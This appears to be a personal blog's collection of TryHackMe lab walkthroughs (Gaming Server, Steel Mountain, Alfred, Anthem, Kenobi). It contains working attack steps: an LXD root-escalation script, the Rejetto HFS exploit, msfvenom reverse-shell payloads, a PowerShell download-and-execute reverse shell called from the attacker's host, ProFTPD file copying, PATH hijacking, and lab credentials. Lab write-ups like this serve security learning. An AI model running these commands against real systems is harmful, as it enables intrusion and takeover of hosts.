s

sk18um

Notes on life, from a person who enjoys constantly learning.

THM - Gaming Server

Gaming Server

skibum 8/30/2020

Enumeration

  1. nmap scan
sudo nmap -sS -sC -O <Machine_IP>                                     
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 21:26 CDT
Nmap scan report for <Machine_IP>
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http
|_http-title: House of danak
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/30%OT=22%CT=1%CU=40971%PV=Y%DS=4%DC=I%G=Y%TM=5F4C601
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M509ST11NW7%O2=M509ST11NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST1
OS:1NW7%O6=M509ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M509NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.31 seconds
  1. There are two ports open one is an http server and the other is ssh. Let's start with the http server.

2.1. Check over http server

wfuzz -w /usr/share/dirb/wordlists/big.txt -u "http://<Machine-IP>/FUZZ" --hc 404 -c
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://<Machine-IP>/FUZZ
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                    
===================================================================

000000015:   403        9 L      28 W     276 Ch      ".htaccess"                                                                
000000016:   403        9 L      28 W     276 Ch      ".htpasswd"                                                                
000015551:   200        3 L      5 W      33 Ch       "robots.txt"                                                               
000016077:   301        9 L      28 W     311 Ch      "secret"                                                                   
000016215:   403        9 L      28 W     276 Ch      "server-status"                                                            
000018777:   301        9 L      28 W     312 Ch      "uploads"                                                                  

Total time: 562.5507
Processed Requests: 20469
Filtered Requests: 20463
Requests/sec.: 36.38605

2.2. look over the robots.txt

user-agent: *
Allow: /
/uploads/

2.3. Now lets check out the http://<Machine-IP>/uploads

  • There is a cracking password dictionary there and a hacker manifesto.

2.4. Now lets check out the secret folder http://<Machine-IP>/seceret

  • There is a secret key in the folder. (RSA Private Key) ```bash -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----

3. When attempting the id_rsa key its askes for a password. (not sure if the usernames are correct.)

4. Crack the ssh password using john the ripper: the password is `letmein`

5. Now `sh john@<Machine-IP> -i secretkey` in to the box, to get the user.txt flag

## Possible Creds

From the pages the names that stand out are "the Mentor" and Beaker from the reverse image search.
- [ ] The Mentor
- [ ] Beaker
- [x] John, from a comment in the html. This is the correct username.

## Priv Esc
1. Run linpeas.sh to see the methods of attack to get higher privilege.
    1. LXD is showing up as a method of attack.
2. Review the method using searchsploit
```bash 
    #!/usr/bin/env bash

    # ----------------------------------
    # Authors: Marcelo Vazquez (S4vitar)
    #          Victor Lasa      (vowkin)
    # ----------------------------------

    # Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
    # Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
    # Step 3: Run this script and you will get root [Victim Machine]
    # Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

    function helpPanel(){
      echo -e "\nUsage:"
      echo -e "\t[-f] Filename (.tar.gz alpine file)"
      echo -e "\t[-h] Show this help panel\n"
      exit 1
    }

    function createContainer(){
      lxc image import $filename --alias alpine && lxd init --auto
      echo -e "[*] Listing images...\n" && lxc image list
      lxc init alpine privesc -c security.privileged=true
      lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
      lxc start privesc
      lxc exec privesc sh
      cleanup
    }

    function cleanup(){
      echo -en "\n[*] Removing container..."
      lxc stop privesc && lxc delete privesc && lxc image delete alpine
      echo " [<E2><88><9A>]"
    }

    set -o nounset
    set -o errexit

    declare -i parameter_enable=0; while getopts ":f:h:" arg; do
      case $arg in
        f) filename=$OPTARG && let parameter_enable+=1;;
        h) helpPanel;;
      esac
    done

    if [ $parameter_enable -ne 1 ]; then
      helpPanel
    else
      createContainer
    fi
  1. Follow the procedure in the method of attack for Ubuntu 18.04
  2. lxc image import ./alpine-v3.12-x86_64-20200905_1639.tar.gz --alias myimage
  3. lxc init myimage ignite -c security.privileged=true
  4. lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
  5. lxc start ignite
  6. lxc exec ignite /bin/sh

P0wn3d!!

  1. Now we have a root shell P0wn3d!! find the flag under /mnt/root/root/root.txt

THM - Steel Mountain

Steel Mountain

skibum 8/29/2020

Exploit

  1. Scan and save to an xml file for searchsploit xml <port protocol="tcp" portid="80"> <state state="open" reason="syn-ack" reason_ttl="125"/> <service name="http" product="Microsoft IIS httpd" version="8.5" ostype="Windows" method="probed" conf="10"> <cpe>cpe:/a:microsoft:iis:8.5</cpe><cpe>cpe:/o:microsoft:windows</cpe> </service> <script id="http-methods" output="&#xa; Potentially risky methods: TRACE"> <table key="Potentially risky methods"><elem>TRACE</elem></table> </script> <script id="http-server-header" output="Microsoft-IIS/8.5"> <elem>Microsoft-IIS/8.5</elem> </script> <script id="http-title" output="Site doesn&apos;t have a title (text/html)."></script> </port> <port protocol="tcp" portid="445"> <state state="open" reason="syn-ack" reason_ttl="125"/> <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds" ostype="Windows Server 2008 R2 - 2012" method="probed" conf="10"> <cpe>cpe:/o:microsoft:windows</cpe> </service> </port> <port protocol="tcp" portid="8080"> <state state="open" reason="syn-ack" reason_ttl="125"/> <service name="http" product="HttpFileServer httpd" version="2.3" ostype="Windows" method="probed" conf="10"> <cpe>cpe:/a:rejetto:httpfileserver:2.3</cpe> <cpe>cpe:/o:microsoft:windows</cpe> </service> <script id="http-server-header" output="HFS 2.3"> <elem>HFS 2.3</elem> </script> <script id="http-title" output="HFS /"> <elem key="title">HFS /</elem> </script> </port>
  2. Since rejetto stands out use searchsploit to list exploits for rejetto
searchsploit rejetto http 2.3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                                                                                                                                  | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                                                                                                                             | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                                                                                                                             | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                                                                                                                        | windows/webapps/34852.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
  1. Review and copy the python exploit 3.1. modify this file to have the proper ip and the port that will be used
  2. Copy (cp) the nc.exe file from SecList to the active pwd
  3. Start a python http server python -m SimpleHTTPServer 80
  4. Create a netcat session nc -nlvp 9001
  5. Run the Exploit python 39161.py <$IP> 8080 7.1. Note that this will need to be ran 2+ times to open the nc session
  6. Find the user.txt under c:\Users\bill\Desktop
  7. Copy winpeas and run to find a priv esc 9.1. Advanced System Care Service 9 is exploitable
  8. Create a reverse shell for the Advanced.exe file msfvenom -p windows/shell_reverse_tcp LHOST=10.13.2.170 LPORT=9002 -f exe -o Advanced.exe
  9. Open a second netcat session nc -nlvp 9002
  10. Download the file to the c:\Program Files (x86)\IObit using powershell -c wget "http://10.11.1.198/Advanced.exe" -outfile Advanced.exe
  11. Run the exploit 13.1. sc stop AdvancedSystemCareService9 13.2. sc start AdvancedSystemCareService9
  12. P0wn3d !!! now get the root flag at c:\Users\Administrator\Desktop

THM - Alfred

Alfred

skibum 8/30/2020

Enumeration and initial shell

  1. NMAP scan

    nmap -sV -sT -Pn -oX nmap/intial <Machine_IP>
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:06 CDT
    Nmap scan report for <Machine_IP>
    Host is up (0.22s latency).
    Not shown: 997 filtered ports
    PORT     STATE SERVICE            VERSION
    80/tcp   open  http               Microsoft IIS httpd 7.5
    3389/tcp open  ssl/ms-wbt-server?
    8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 36.91 seconds
    
  2. There are two ports with web servers on them
    2.1. Port 80 which just contains a RIP for Bruce Wane
    2.2. Port 8080 is a login for Jenkins

  3. Check for default login values.
    Test username:Password as admin:admin

    • This worked to grant us access.
  4. From the main menu select project in the center > Select configure this allow you to modify the code to be run on the underlining system.

    powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.2.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.2.170 -Port 1337
    
  5. Run a python3 -m http.server and nc -nlvp 1337 before building the project.

  6. A user shell is now avaible.

Priv esc

  1. Generate a meterperter shell

    msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.2.170 LPORT=9001 -f exe -o knockknock.exe  
    
  2. Download to the shell

    powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.2.170:8000/knockknock.exe','knockknock.exe')" 
    
  3. Set the multi handler with the windows/meterpreter/reverse_tcp payload

  4. Run the exploit on the msfconsole and then run the exe on the shell.

  5. With the meterperter shell up check the privileges.

    PS> whoami /priv
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                  Description                               State   
    =============================== ========================================= ========
    SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
    SeSecurityPrivilege             Manage auditing and security log          Disabled
    SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
    SeLoadDriverPrivilege           Load and unload device drivers            Disabled
    SeSystemProfilePrivilege        Profile system performance                Disabled
    SeSystemtimePrivilege           Change the system time                    Disabled
    SeProfileSingleProcessPrivilege Profile single process                    Disabled
    SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
    SeCreatePagefilePrivilege       Create a pagefile                         Disabled
    SeBackupPrivilege               Back up files and directories             Disabled
    SeRestorePrivilege              Restore files and directories             Disabled
    SeShutdownPrivilege             Shut down the system                      Disabled
    SeDebugPrivilege                Debug programs                            Enabled 
    SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
    SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
    SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
    SeUndockPrivilege               Remove computer from docking station      Disabled
    SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
    SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege         Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
    SeTimeZonePrivilege             Change the time zone                      Disabled
    SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
    
  6. As the SeImpersonatePrivilege is enables lets try and impersonate it. Load the load incognito module in the meterpreter session

  7. Lets list the tokens

    list_tokens -g
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
                 Call rev2self if primary process token is SYSTEM
    
    Delegation Tokens Available
    ========================================
    \
    BUILTIN\Administrators
    BUILTIN\IIS_IUSRS
    BUILTIN\Users
    NT AUTHORITY\Authenticated Users
    NT AUTHORITY\NTLM Authentication
    NT AUTHORITY\SERVICE
    NT AUTHORITY\This Organization
    NT AUTHORITY\WRITE RESTRICTED
    NT SERVICE\AppHostSvc
    NT SERVICE\AudioEndpointBuilder
    NT SERVICE\BFE
    NT SERVICE\CertPropSvc
    NT SERVICE\CscService
    NT SERVICE\Dnscache
    NT SERVICE\eventlog
    NT SERVICE\EventSystem
    NT SERVICE\FDResPub
    NT SERVICE\iphlpsvc
    NT SERVICE\LanmanServer
    NT SERVICE\MMCSS
    NT SERVICE\PcaSvc
    NT SERVICE\PlugPlay
    NT SERVICE\RpcEptMapper
    NT SERVICE\Schedule
    NT SERVICE\SENS
    NT SERVICE\SessionEnv
    NT SERVICE\Spooler
    NT SERVICE\TrkWks
    NT SERVICE\UmRdpService
    NT SERVICE\UxSms
    NT SERVICE\WdiSystemHost
    NT SERVICE\Winmgmt
    NT SERVICE\WSearch
    NT SERVICE\wuauserv
    
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\NETWORK
    NT SERVICE\AudioSrv
    NT SERVICE\CryptSvc
    NT SERVICE\DcomLaunch
    NT SERVICE\Dhcp
    NT SERVICE\DPS
    NT SERVICE\LanmanWorkstation
    NT SERVICE\lmhosts
    NT SERVICE\MpsSvc
    NT SERVICE\netprofm
    NT SERVICE\nsi
    NT SERVICE\PolicyAgent
    NT SERVICE\Power
    NT SERVICE\ShellHWDetection
    NT SERVICE\W32Time
    NT SERVICE\WdiServiceHost
    NT SERVICE\WinHttpAutoProxySvc
    NT SERVICE\wscsvc
    
  8. Since the BUILTIN\Administrators is available lest try and impersonate it impersonate_token "BUILTIN\Administrators"

  9. We are now the NT AUTHORITY\SYSTEM lets migrate the permissions to make sure we maintain it

  10. Use the PS command to list the processes and check for the services.exe process. It was 668!

  11. Now lets migrate the permissions migrate 668

  12. P0wn3d!!! now read the root.txt file at C:\Windows\System32\config

THM - Anthem

Anthem

skibum 8/20/20

Intial IP BOX_IP = 10.10.42.63

Recon

sudo nmap -sS -sV -sC BOX_IP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 07:11 CDT
Nmap scan report for BOX_IP
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-robots.txt: 4 disallowed entries 
|_/bin/ /config/ /umbraco/ /umbraco_client/
|_http-title: Anthem.com - Welcome to our blog
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-LU09299160F
|   NetBIOS_Domain_Name: WIN-LU09299160F
|   NetBIOS_Computer_Name: WIN-LU09299160F
|   DNS_Domain_Name: WIN-LU09299160F
|   DNS_Computer_Name: WIN-LU09299160F
|   Product_Version: 10.0.17763
|_  System_Time: 2020-08-20T12:12:02+00:00
| ssl-cert: Subject: commonName=WIN-LU09299160F
| Not valid before: 2020-04-04T22:56:38
|_Not valid after:  2020-10-04T22:56:38
|_ssl-date: 2020-08-20T12:12:11+00:00; 0s from scanner time.

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/20%OT=80%CT=1%CU=39280%PV=Y%DS=4%DC=T%G=Y%TM=5F3E689
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=
OS:U)SEQ(SP=107%GCD=1%ISR=10C%CI=I%II=I%TS=U)OPS(O1=M509NW8NNS%O2=M509NW8NN
OS:S%O3=M509NW8%O4=M509NW8NNS%O5=M509NW8NNS%O6=M509NNS)WIN(W1=FFFF%W2=FFFF%
OS:W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M509NW8NNS%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF
OS:=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-20T12:12:02
|_  start_date: N/A

Creds

user

  • Name: Solomon Grundy
    • Note this is found by searching the poem on the website.
  • Email: SG@anthem.com
  • Possible Password: UmbracoIsTheBest! (Found on the robots.txt page)

admin

  • Name: Administrator
  • Password: ChangeMeBaby1MoreTime (Found on a backup text file.)

Interesting Information

  • RPC open on port 135
  • ms wbt terminal open on port 3389

  • Note that the RDP is up on the machine.

THM - Kenobi

Kenobi

skibum 8/29/2020

Recon

NMAP scans

  1. Scan for open ports and understand what is avaible.

    nmap -A -oN nmap/FullScan <Machine_IP> 
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 06:56 CDT
    Nmap scan report for <Machine_IP> 
    Host is up (0.20s latency).
    Not shown: 990 closed ports
    PORT     STATE    SERVICE       VERSION
    21/tcp   open     ftp           ProFTPD 1.3.5
    22/tcp   open     ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
    |   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
    |_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
    80/tcp   open     http          Apache httpd 2.4.18 ((Ubuntu))
    | http-robots.txt: 1 disallowed entry 
    |_/admin.html
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp  open     rpcbind       2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100003  2,3,4       2049/udp6  nfs
    |   100005  1,2,3      36173/udp   mountd
    |   100005  1,2,3      38913/tcp6  mountd
    |   100005  1,2,3      43825/udp6  mountd
    |   100005  1,2,3      44273/tcp   mountd
    |   100021  1,3,4      37709/tcp   nlockmgr
    |   100021  1,3,4      44971/tcp6  nlockmgr
    |   100021  1,3,4      46911/udp   nlockmgr
    |   100021  1,3,4      49498/udp6  nlockmgr
    |   100227  2,3         2049/tcp   nfs_acl
    |   100227  2,3         2049/tcp6  nfs_acl
    |   100227  2,3         2049/udp   nfs_acl
    |_  100227  2,3         2049/udp6  nfs_acl
    139/tcp  open     netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open     netbios-ssn   Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    1666/tcp filtered netview-aix-6
    1801/tcp filtered msmq
    2049/tcp filtered nfs
    3703/tcp filtered adobeserver-3
    Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
    |_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
    |_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery: 
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: kenobi
    |   NetBIOS computer name: KENOBI\x00
    |   Domain name: \x00
    |   FQDN: kenobi
    |_  System time: 2020-08-29T06:56:47-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-08-29T11:56:47
    |_  start_date: N/A
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
    
  2. Knowing that SMB and RPC are avaibe lets script scan SMB first.

    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <Machine_IP> -oN nmap/smb445   
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:44 CDT
    Nmap scan report for<Machine_IP> 
    Host is up (0.21s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\1<Machine_IP>\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: <unlimited>
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\<Machine_IP>\anonymous: 
    |     Type: STYPE_DISKTREE
    |     Comment: 
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\home\kenobi\share
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\1<Machine_IP>\print$: 
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: <none>
    |_    Current user access: <none>
    |_smb-enum-users: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 43.14 seconds
    
  3. Now lets script scan RPC.

    nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <Machine_IP> -oN nmap/rpc111
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:47 CDT
    Nmap scan report for 10.10.1.115
    Host is up (0.30s latency).
    
    PORT    STATE SERVICE
    111/tcp open  rpcbind
    | nfs-showmount: 
    |_  /var *
    
    Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
    

SMB client

  • Smb client

    smbclient //<Machine_IP>/Anonymous 
    Enter WORKGROUP\skibum's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Sep  4 05:49:09 2019
      ..                                  D        0  Wed Sep  4 05:56:07 2019
      log.txt                             N    12237  Wed Sep  4 05:49:09 2019
    
            9204224 blocks of size 1024. 6877100 blocks available
    smb: \> get log.txt
    getting file \log.txt of size 12237 as log.txt (12.2 KiloBytes/sec) (average 12.2 KiloBytes/sec)
    smb: \> exit
    

cat log.txt


## FTP

1. Try and connect on the FTP

netcat 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) []

SITE CPFR /home/kenobi/.ssh/idrsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id
rsa
250 Copy successful


2. Exploit proFTPD 1.3.5

mkdir /mnt/kenobiNFS
mount :/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS


3. ssh into the machnine

ssh -i idrsa kenobi@<MachineIP>


## priv esc

1. Find SUID files
``` bash
find / -perm /4000 -type f 2>/dev/null

Look for somthing that stands out.

  • /sbin/mount.nfs
  • /usr/lib/policykit-1/polkit-agent-helper-1
  • /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  • /usr/lib/snapd/snap-confine
  • /usr/lib/eject/dmcrypt-get-device
  • /usr/lib/openssh/ssh-keysign
  • /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  • /usr/bin/chfn
  • /usr/bin/newgidmap
  • /usr/bin/pkexec
  • /usr/bin/passwd
  • /usr/bin/newuidmap
  • /usr/bin/gpasswd
  • /usr/bin/menu
  • /usr/bin/sudo
  • /usr/bin/chsh
  • /usr/bin/at
  • /usr/bin/newgrp
  • /bin/umount
  • /bin/fusermount
  • /bin/mount
  • /bin/ping
  • /bin/su
  • /bin/ping6
  1. run and check out the binary that stands out.

    1. status check
    2. kernel version
    3. ifconfig
    ** Enter your choice :1
    HTTP/1.1 200 OK
    Date: Sat, 29 Aug 2020 17:51:48 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
    ETag: "c8-591b6884b6ed2"
    Accept-Ranges: bytes
    Content-Length: 200
    Vary: Accept-Encoding
    Content-Type: text/html
    

    Note that status check runs a curl command, can we overrite the path and machine?

  2. Try and overwrite the machine curl command.

    echo /bin/sh > curl
    chmod 777 curl
    export PATH=/tmp:$PATH
    /usr/bin/menu
    

  1. status check
  2. kernel version
  3. ifconfig ** Enter your choice :1 # id uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare) # whoami root # ```

P0wn3d!!!!

THM - Blue

Blue

Skibum 5/2/2020


IP address 10.10.124.30

Recon

